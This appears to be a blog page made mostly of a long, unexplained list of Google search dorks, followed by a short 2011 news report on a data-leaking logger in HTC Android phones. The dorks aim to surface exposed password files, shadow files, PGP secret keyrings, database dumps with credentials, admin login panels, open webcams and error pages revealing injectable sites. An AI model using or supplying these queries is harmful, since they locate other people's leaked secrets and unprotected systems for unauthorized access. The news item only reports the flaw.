filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
filetype:reg reg +intext:"WINVNC3"
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"EZGuestbook"
intext:"Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql.default_password" +"Zend Scripting Language Engine"
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:Index.of etc shadow
intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:rapidshare intext:login
inurl:"calendarscript/users.txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
inurl:"GRC.DAT" intext:"password"
inurl:"Sites.dat"+"PASS="
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"wvdial.conf" intext:"password"
inurl:/db/main.mdb
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:pap-secrets -cvs
inurl:pass.dat
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:zebra.conf intext:password -sample -test -tutorial -download
LeapFTP intitle:"index.of./" sites.ini modified
master.passwd
mysql history files
NickServ registration passwords
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
people.lst
psyBNC config files
pwd.db
server-dbs "intitle:index of"
signin filetype:url
spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password= filetype:ica
intitle:"remote assessment" OpenAanval Console
intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password"
"bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com
"Emergisoft web applications are a part of our"
"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-
"HostingAccelerator" intitle:"login" +"Username" -"news" -demo
"iCONECT 4.1 :: Login"
"IMail Server Web Messaging" intitle:login
"inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com
"intitle:3300 Integrated Communications Platform" inurl:main.htm
"Login - Sun Cobalt RaQ"
"login prompt" inurl:GM.cgi
"Login to Usermin" inurl:20000
"Microsoft CRM : Unsupported Browser Version"
"OPENSRS Domain Management" inurl:manage.cgi
"pcANYWHERE EXPRESS Java Client"
"Please authenticate yourself to get access to the management interface"
"please log in"
"Please login with admin pass" -"leak" -sourceforge
"CuteNews" "2003..2005 CutePHP"
"DWMail" password intitle:dwmail
"Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com
"Midmart Messageboard" "Administrator Login"
"Monster Top List" MTL numrange:200-
"UebiMiau" -site:sourceforge.net
"site info for" "Enter Admin Password"
"SquirrelMail version" "By the SquirrelMail development Team"
"SysCP - login"
"This is a restricted Access Server" "JavaScript Not Enabled!"|"Messenger Express" -edu -ac
"This section is for Administrators only. If you are an administrator then please"
"ttawlogin.cgi/?action="
"VHCS Pro ver" -demo
"VNC Desktop" inurl:5800
"Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com
"WebExplorer Server - Login" "Welcome to WebExplorer Server"
"WebSTAR Mail - Please Log In"
"You have requested access to a restricted area of our website. Please authenticate yourself to continue."
"You have requested to access the management functions" -.edu
(intitle:"Please login - Forums UBB.threads")|(inurl:login.php "ubb")
(intitle:"Please login - Forums WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwthreads/login.pl?Cat=")
(intitle:"rymo Login")|(intext:"Welcome to rymo") -family
(intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration")
(inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp) -site:remedy.com -site:mil
4images Administration Control Panel
allintitle:"Welcome to the Cyclades"
allinurl:"exchange/logon.asp"
allinurl:wps/portal/ login
ASP.login_aspx "ASP.NET_SessionId"
CGI:IRC Login
ext:cgi intitle:"control panel" "enter your owner password to continue!"
ez Publish administration
filetype:php inurl:"webeditor.php"
filetype:pl "Download: SuSE Linux Openexchange Server CA"
filetype:r2w r2w
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu
intext:"Mail admins login here to administrate your domain."
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Storage Management Server for" intitle:"Server Administration"
intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee
intext:"vbulletin" inurl:admincp
intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press
intitle:"Admin Login" "admin login" "blogware"
intitle:"Admin login" "Web Site Administration" "Copyright"
intitle:"AlternC Desktop"
intitle:"Athens Authentication Point"
intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co
intitle:"ColdFusion Administrator Login"
intitle:"communigate pro * *" intitle:"entrance"
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Dell Remote Access Controller"
intitle:"Docutek ERes - Admin Login" -edu
intitle:"Employee Intranet Login"
intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here."
intitle:"ePowerSwitch Login"
intitle:"eXist Database Administration" -demo
intitle:"EXTRANET * - Identification"
intitle:"EXTRANET login" -.edu -.mil -.gov
intitle:"EZPartner" -netpond
intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists
intitle:"i-secure v1.1" -edu
intitle:"Icecast Administration Admin Page"
intitle:"iDevAffiliate - admin" -demo
intitle:"ISPMan : Unauthorized Access prohibited"
intitle:"ITS System Information" "Please log on to the SAP System"
intitle:"Kurant Corporation StoreSense" filetype:bok
intitle:"ListMail Login" admin -demo
intitle:"Login -
Easy File Sharing Web Server"
intitle:"Login Forum
AnyBoard" intitle:"If you are a new user:" intext:"Forum
AnyBoard" inurl:gochat -edu
intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman
intitle:"Login to Cacti"
intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=
intitle:"MailMan Login"
intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi
intitle:"Merak Mail Server Web Administration" -ihackstuff.com
intitle:"microsoft certificate services" inurl:certsrv
intitle:"MikroTik RouterOS Managing Webpage"
intitle:"MX Control Console" "If you can't remember"
intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf
intitle:"Novell Web Services" intext:"Select a service and a language."
intitle:"oMail-admin Administration - Login" -inurl:omnis.ch
intitle:"OnLine Recruitment Program - Login"
intitle:"Philex 0.2*" -s?ri?t -site:freelists.org
intitle:"PHP Advanced Transfer" inurl:"login.php"
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"phpPgAdmin - Login" Language
intitle:"PHProjekt - login" login password
intitle:"please login" "your password is *"
intitle:"Remote Desktop Web Connection" inurl:tsweb
intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"
intitle:"SHOUTcast Administrator" inurl:admin.cgi
intitle:"site administration: please log in" "site designed by emarketsouth"
intitle:"Supero Doctor III" -inurl:supermicro
intitle:"SuSE Linux Openexchange Server" "Please activate Javas?ri?t!"
intitle:"teamspeak server-administration
intitle:"Tomcat Server Administration"
intitle:"TOPdesk ApplicationServer"
intitle:"TUTOS Login"
intitle:"TWIG Login"
intitle:"vhost" intext:"vHost . 2000-2004"
intitle:"Virtual Server Administration System"
intitle:"VisNetic WebMail" inurl:"/mail/"
intitle:"VitalQIP IP Management System"
intitle:"VMware Management Interface:" inurl:"vmware/en/"
intitle:"VNC viewer for Java"
intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org
intitle:"WebLogic Server" intitle:"Console Login" inurl:console
intitle:"Welcome Site/User Administrator" "Please select the language" -demos
intitle:"Welcome to Mailtraq WebMail"
intitle:"welcome to netware *" -site:novell.com
intitle:"WorldClient" intext:"? (2003|2004) Alt-N Technologies."
intitle:"xams 0.0.0..15 - Login"
intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin
intitle:"XMail Web Administration Interface" intext:Login intext:password
intitle:"Zope Help System" inurl:HelpSys
intitle:"ZyXEL Prestige Router" "Enter password"
intitle:"inc. vpn 3000 concentrator"
intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak?.mail.login.page | inurl:sake.servlet
intitle:Group-Office "Enter your username and password to login"
intitle:ilohamail "
IlohaMail"
intitle:ilohamail intext:"Version 0.8.10" "
IlohaMail"
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:"RT is ? Copyright"
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"
intitle:open-xchange inurl:login.pl
intitle:Ovislink inurl:private/login
intitle:phpnews.login
intitle:plesk inurl:login.php3
inurl:"/admin/configuration. php?" Mystore
inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"
inurl:"1220/parse_xml.cgi?"
inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)
inurl:":10000" intext:webmin
inurl:"Activex/default.htm" "Demo"
inurl:"calendar.asp?action=login"
inurl:"default/login.php" intitle:"kerio"
inurl:"gs/adminlogin.aspx"
inurl:"php121login.php"
inurl:"suse/login.pl"
inurl:"typo3/index.php?u=" -demo
inurl:"usysinfo?login=true"
inurl:"utilities/TreeView.asp"
inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp

inurl:/admin/login.asp
inurl:/cgi-bin/sqwebmail?noframes=1
inurl:/Citrix/Nfuse17/
inurl:/dana-na/auth/welcome.html
inurl:/eprise/
inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net
inurl:/modcp/ intext:Moderator+vBulletin
inurl:/SUSAdmin intitle:"Microsoft Software update Services"
inurl:/webedit.* intext:WebEdit Professional -html
inurl:1810 "Oracle Enterprise Manager"
inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com
inurl::2082/frontend -demo
inurl:administrator "welcome to mambo"
inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0
inurl:cgi-bin/ultimatebb.cgi?ubb=login
inurl:Citrix/MetaFrame/default/default.aspx
inurl:confixx inurl:login|anmeldung
inurl:coranto.cgi intitle:Login (Authorized Users Only)
inurl:csCreatePro.cgi
inurl:default.asp intitle:"WebCommander"
inurl:exchweb/bin/auth/owalogon.asp
inurl:gnatsweb.pl
inurl:ids5web
inurl:irc filetype:cgi cgi:irc
inurl:login filetype:swf swf
inurl:login.asp
inurl:login.cfm
inurl:login.php "SquirrelMail version"
inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
inurl:mewebmail
inurl:names.nsf?opendatabase
inurl:ocw_login_username
inurl:orasso.wwsso_app_admin.ls_login
inurl:postfixadmin intitle:"postfix admin" ext:php
inurl:search/admin.php
inurl:textpattern/index.php
inurl:WCP_USER
inurl:webmail./index.pl "Interface"
inurl:webvpn.html "login" "Please enter your"
Login ("
Jetbox One CMS â?¢" | "
Jetstream ? *")
Novell NetWare intext:"netware management portal version"
Outlook Web Access (a better way)
PhotoPost PHP Upload
PHPhotoalbum Statistics
PHPhotoalbum Upload
phpWebMail
Please enter a valid password! inurl:polladmin

INDEXU
Ultima Online loginservers
W-Nailer Upload Area
intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu
"#mysql dump" filetype:sql
"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3
"allow_call_time_pass_reference" "PATH_INFO"
"Certificate Practice Statement" inurl:(PDF | DOC)
"Generated by phpSystem"
"generated by wwwstat"
"Host Vulnerability Summary Report"
"HTTP_FROM=googlebot" googlebot.com "Server_Software="
"Index of" / "chat/logs"
"Installed Objects Scanner" inurl:default.asp
"MacHTTP" filetype:log inurl:machttp.log
"Mecury Version" "Infastructure Group"
"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log
"Most Submitted Forms and s?ri?ts" "this section"
"Network Vulnerability Assessment Report"
"not for distribution" confidential
"not for public release" -.edu -.gov -.mil
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
"phpMyAdmin" "running on" inurl:"main.php"
"produced by getstats"
"Request Details" "Control Tree" "Server Variables"
"robots.txt" "Disallow:" filetype:txt
"Running in Child mode"
"sets mode: +p"
"sets mode: +s"
"Thank you for your order" +receipt
"This is a Shareaza Node"
"This report was generated by WebLog"
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject
(intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results")
(intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob
(inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt
+":8080" +":3128" +":80" filetype:txt
+"HSTSNR" -"netop.com"
-site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp
94FBR "ADOBE PHOTOSHOP"
AIM buddy lists
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:cdkey.txt
allinurl:servlet/SnoopServlet
cgiirc.conf
contacts ext:wml
data filetype:mdb -site:gov -site:mil
exported email addresses
ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential
ext:asp inurl:pathto.asp
ext:ccm ccm -catacomb
ext:CDX CDX
ext:cgi inurl:editcgi.cgi inurl:file=
ext:conf inurl:rsyncd.conf -cvs -man
ext:conf NoCatAuth -cvs
ext:dat bpk.dat
ext:gho gho
ext:ics ics
ext:ini intext:env.ini
ext:jbf jbf
ext:ldif ldif
ext:log "Software: Microsoft Internet Information Services *.*"
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
ext:plist filetype:plist inurl:bookmarks.plist
ext:pqi pqi -database
ext:reg "username=*" putty
ext:txt "Final encryption key"
ext:txt inurl:dxdiag
ext:vmdk vmdk
ext:vmx vmx
filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:bkf bkf
filetype:blt "buddylist"
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"
filetype:fp3 fp3
filetype:fp5 fp5 -site:gov -site:mil -"cvs log"
filetype:fp7 fp7
filetype:inf inurl:capolicy.inf
filetype:lic lic intext:key
filetype:log access.log -CVS
filetype:log cron.log
filetype:mbx mbx intext:Subject
filetype:myd myd -CVS
filetype:ns1 ns1
filetype:ora ora
filetype:ora tnsnames
filetype:pdb pdb backup (Pilot | Pluckerdb)
filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net
filetype:pot inurl:john.pot
filetype:PS ps
filetype:pst inurl:"outlook.pst"
filetype:pst pst -from -to -date
filetype:qbb qbb
filetype:QBW qbw
filetype:rdp rdp
filetype:reg "Terminal Server Client"
filetype:vcs vcs
filetype:wab wab
filetype:xls -site:gov inurl:contact
filetype:xls inurl:"email.xls"
Financial spreadsheets: finance.xls
Financial spreadsheets: finances.xls
Ganglia Cluster Reports
haccess.ctl (one way)
haccess.ctl (VERY reliable)
ICQ chat logs, please...
intext:"Session Start * * * *:*:* *" filetype:log
intext:"Tobias Oetiker" "traffic analysis"
intext:(password | passcode) intext:(username | userid | user) filetype:csv
intext:gmail invite intext:http://gmail.google.com/gmail/a
intext:SQLiteManager inurl:main.php
intext:ViewCVS inurl:Settings.php
intitle:"admin panel" +"
RedKernel"
intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:"AppServ Open Project" -site:www.appservnetwork.com
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
intitle:"Big Sister" +"OK Attention Trouble"
intitle:"curriculum vitae" filetype:doc
intitle:"edna:streaming mp3 server" -forums
intitle:"FTP root at"
intitle:"index of" +myd size
intitle:"Index Of" -inurl:maillog maillog size
intitle:"Index Of" cookies.txt size
intitle:"index of" mysql.conf OR mysql_config
intitle:"Index of" upload size parent directory
intitle:"index.of *" admin news.asp configview.asp
intitle:"index.of" .diz .nfo last modified
intitle:"Joomla - Web Installer"
intitle:"LOGREP - Log file reporting system" -site:itefix.no
intitle:"Multimon UPS status page"
intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )
intitle:"PhpMyExplorer" inurl:"index.php" -cvs
intitle:"statistics of" "advanced web statistics"
intitle:"System Statistics" +"System and Network Information Center"
intitle:"urchin (5|3|admin)" ext:cgi
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"wbem" compaq login "Compaq Information Technologies Group"
intitle:"Web Server Statistics for ****"
intitle:"web server status" SSH Telnet
intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"
intitle:"welcome.to.squeezebox"
intitle:admin intitle:login
intitle:Bookmarks inurl:bookmarks.html "Bookmarks"
intitle:index.of "Apache" "server at"
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:"phone"
inurl:"/axs/ax-admin.pl" -s?ri?t
inurl:"/cricket/grapher.cgi"
inurl:"bookmark.htm"
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM
inurl:"newsletter/admin/"
inurl:"newsletter/admin/" intitle:"newsletter admin"
inurl:"putty.reg"
inurl:"smb.conf" intext:"workgroup" filetype:conf conf
inurl:*db filetype:mdb
inurl:/cgi-bin/pass.txt
inurl:/_layouts/settings
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:build.err
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
inurl:changepassword.asp
inurl:ds.py
inurl:email filetype:mdb
inurl:fcgi-bin/echo
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
inurl:netscape.hst
inurl:netscape.ini
inurl:odbc.ini ext:ini -cvs
inurl:perl/printenv
inurl:php.ini filetype:ini
inurl:preferences.ini "[emule]"
inurl:profiles filetype:mdb
inurl:report "EVEREST Home Edition "
inurl:server-info "Apache Server Information"
inurl:server-status "apache"
inurl:snitz_forums_2000.mdb
inurl:ssl.conf filetype:conf
inurl:tdbin
inurl:vbstats.php "page generated"
inurl:wp-mail.php + "There doesn't seem to be any new mail."
inurl:XcCDONTS.asp
ipsec.conf
ipsec.secrets
Lotus Domino address books
mail filetype:csv -site:gov intext:name
Microsoft Money Data Files
mt-db-pass.cgi files
MySQL tabledata dumps
mystuff.xml - Trillian data files
OWA Public Folders (direct view)
Peoples MSN contact lists
php-addressbook "This is the addressbook for *" -warning
phpinfo()
phpMyAdmin dumps
private key files (.csr)
private key files (.key)
Quicken data files
rdbqds -site:.edu -site:.mil -site:.gov
robots.txt
site:edu admin grades
site:www.mailinator.com inurl:ShowMail.do
SQL data dumps
Squid cache server reports
Unreal IRCd
WebLog Referrers
Welcome to ntop!
File containing information about the network:
filetype:log intext:"ConnectionManager2"
"apricot - admin" 00h
"by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta"
"Network Host Assessment Report" "Internet Scanner"
"Output produced by SysWatch *"
"Phorum Admin" "Database Connection" inurl:forum inurl:admin
phpOpenTracker" Statistics
"powered | performed by Beyond Security's Automated Scanning" -kazaa -example
"Shadow Security Scanner performed a vulnerability assessment"
"SnortSnarf alert page"
"The following report contains confidential information" vulnerability -search
"The statistics were last upd?t?d" "Daily"-microsoft.com
"this proxy is working fine!" "enter *" "URL***" * visit
"This report lists" "identified by Internet Scanner"
"Traffic Analysis for" "RMON Port * on unit *"
"Version Info" "Boot Version" "Internet Settings"
((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))
Analysis Console for Incident Databases
ext:cfg radius.cfg
ext:cgi intext:"nrg-" " This web page was created on "
filetype:pdf "Assessment Report" nessus
filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"
filetype:php inurl:nqt intext:"Network Query Tool"
filetype:vsd vsd network -samples -examples
intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm
intitle:"ADSL Configuration page"
intitle:"Azureus : Java BitTorrent Client Tracker"
intitle:"Belarc Advisor Current Profile" intext:"Click here for Belarc's PC Management products, for large and small companies."
intitle:"BNBT Tracker Info"
intitle:"Microsoft Site Server Analysis"
intitle:"Nessus Scan Report" "This file was generated by Nessus"
intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"
intitle:"Retina Report" "CONFIDENTIAL INFORMATION"
intitle:"start.managing.the.device" remote pbx acc
intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."
intitle:"twiki" inurl:"TWikiUsers"
inurl:"/catalog.nsf" intitle:catalog
inurl:"install/install.php"
inurl:"map.asp?" intitle:"WhatsUp Gold"
inurl:"NmConsole/Login.asp" | intitle:"Login - Ipswitch WhatsUp Professional 2005" | intext:"Ipswitch WhatsUp Professional 2005 (SP1)" "Ipswitch, Inc"
inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo
inurl:/adm-cfgedit.php
inurl:/cgi-bin/finger? "In real life"
inurl:/cgi-bin/finger? Enter (account|host|user|username)
inurl:/counter/index.php intitle:"+PHPCounter 7.*"
inurl:CrazyWWWBoard.cgi intext:"detailed debugging information"
inurl:login.jsp.bak
inurl:ovcgi/jovw
inurl:phpSysInfo/ "created by phpsysinfo"
inurl:portscan.php "from Port"|"Port Range"
inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl
inurl:statrep.nsf -gov
inurl:status.cgi?host=all
inurl:testcgi xitami
inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin
inurl:webutil.pl
Looking Glass
site:netcraft.com intitle:That.Site.Running Apache
"A syntax error has occurred" filetype:ihtml
"access denied for user" "using password"
"An illegal character has been found in the statement" -"previous message"
"ASP.NET_SessionId" "data source="
"Can't connect to local" intitle:warning
"Chatologica MetaSearch" "stack tracking"
"detected an internal error [IBM][CLI Driver][DB2/6000]"
"error found handling the request" cocoon filetype:xml
"Fatal error: Call to undefined function" -reply -the -next
"Incorrect syntax near"
"Incorrect syntax near"
"Internal Server Error" "server at"
"Invision Power Board Database Error"
"ORA-00933: SQL command not properly ended"
"ORA-12541: TNS:no listener" intitle:"error occurred"
"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php
"PostgreSQL query failed: ERROR: parser: parse error"
"Supplied argument is not a valid MySQL result resource"
"Syntax error in query expression " -the
"The s?ri?t whose uid is " "is not allowed to access"
"There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser."
"Unable to jump to row" "on MySQL result index" "on line"
"Unclosed quotation mark before the character string"
"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum
"Warning: Cannot modify header information - headers already sent"
"Warning: Division by zero in" "on line" -forum

"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum
"Warning: mysql_query()" "invalid query"
"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"
"Warning: Supplied argument is not a valid File-Handle resource in"
"Warning:" "failed to open stream: HTTP request failed" "on line"
"Warning:" "SAFE MODE Restriction in effect." "The s?ri?t whose uid is" "is not allowed to access owned by uid 0 in" "on line"
"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"
An unexpected token "END-OF-STATEMENT" was found
Coldfusion Error Pages
filetype:asp + "[ODBC SQL"
filetype:asp "Custom Error Message" Category Source
filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"
filetype:php inurl:"logging.php" "Discuz" error
ht://Dig htsearch error
IIS 4.0 error messages
IIS web server error messages
Internal Server Error
intext:"Error Message : Error loading required libraries."
intext:"Warning: Failed opening" "on line" "include_path"
intitle:"Apache Tomcat" "Error Report"
intitle:"Default PLESK Page"
intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm
intitle:"Error Occurred" "The error occurred in" filetype:cfm
intitle:"Error using Hypernews" "Server Software"
intitle:"Execution of this s?ri?t not permitted"
intitle:"Under construction" "does not currently have"
intitle:Configuration.File inurl:softcart.exe
MYSQL error message: supplied argument....
mysql error with query
Netscape Application Server Error page
ORA-00921: unexpected end of SQL command
ORA-00936: missing expression
PHP application warnings failing "include_path"
sitebuildercontent
sitebuilderfiles
sitebuilderpictures
Snitz! forums db path error
SQL syntax error
Supplied argument is not a valid PostgreSQL result
warning "error on line" php sablotron
Windows 2000 web server error messages
"ftp://" "www.eastgame.net"
"html allowed" guestbook
: vBulletin Version 1.1.5"
"Select a database to view" intitle:"filemaker pro"
"set up the administrator user" inurl:pivot
"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row
"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin
"Welcome to Intranet"
"Welcome to PHP-Nuke" congratulations
"Welcome to the Prestige Web-Based Configurator"
"YaBB SE Dev Team"
"you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos
("Indexed.By"|"Monitored.By") hAcxFtpScan
(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)
allinurl:"index.php" "site=sglinks"
allinurl:install/install.php
allinurl:intranet admin
filetype:cgi inurl:"fileman.cgi"
filetype:cgi inurl:"Web_Store.cgi"
filetype:php inurl:vAuthenticate
filetype:pl intitle:"Ultraboard Setup"
Gallery in configuration mode
Hassan Consulting's Shopping Cart Version 1.18
intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -
intitle:"Gateway Configuration Menu"
intitle:"Horde :: My Portal" -"[Tickets"
intitle:"Mail Server CMailServer Webmail" "5.2"
intitle:"MvBlog powered"
intitle:"Remote Desktop Web Connection"
intitle:"Samba Web Administration Tool" intext:"Help Workgroup"
intitle:"Terminal Services Web Connection"
intitle:"Uploader - Uploader v6" -pixloads.com
intitle:osCommerce inurl:admin intext:"redistributable under the GNU" intext:"Online Catalog" -demo -site:oscommerce.com
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
inurl:"/NSearch/AdminServlet"
inurl:"index.php? module=ew_filemanager"
inurl:aol*/_do/rss_popup?blogID=
inurl:footer.inc.php
inurl:info.inc.php
inurl:ManyServers.htm
inurl:newsdesk.cgi? inurl:"t="
inurl:pls/admin_/gateway.htm
inurl:rpSys.html
inurl:search.php vbulletin
inurl:servlet/webacc
natterchat inurl:home.asp -site:natterchat.co.uk
XOOPS Custom Installation
inurl:htpasswd filetype:htpasswd
inurl:yapboz_detay.asp + View Webcam User Accessing
allinurl:control/multiview
inurl:"ViewerFrame?Mode="
intitle:"WJ-NT104 Main Page"
inurl:netw_tcp.shtml
intitle:"supervisioncam protocol"

2011-10-02

Security Holes in Android HTC phones.

A security hole found in some HTC Android phones could give apps with Internet permissions access to information like a user’s location and their text messages, Android Police reported today. The vulnerability is part of HTC’s Sense UI and affects a subset of the brand’s most popular phones, including the HTC Thunderbolt and the EVO 4G.

The affected HTC phones have an application package titled HTCLoggers.apk installed with root-level access. Apps with Internet permissions can access HTCLoggers.apk, which provides access to information like GPS data, WiFi network data, memory info, running processes, SMS data (including phone numbers and encoded text), and system logs that can include information like e-mail addresses and phone numbers.
When called upon, the logging program opens a local port that will provide this data to any app that asks for it. Apps can send the data off to a remote server for safekeeping, as shown by a proof-of-concept app that Android Police researchers developed.

The authors note that the flaw can’t be fixed in the stock Sense UI without an update or patch from HTC. The owners of the relevant phones (a partial list: Thunderbolt, EVO 3D, EVO 4G, EVO Shift 4G) can delete HTCLoggers from their devices if they root the phones.

While the report doesn’t note any concrete examples of nefarious use of the HTCLogger data, this is far more access than Google allows via Android by default—typically, the OS doesn’t let information of this type off a device without direct consent. HTC has made no official reply to inquiries from the researchers, and did not respond immediately to Ars’ requests for comment. 


2011-10-01

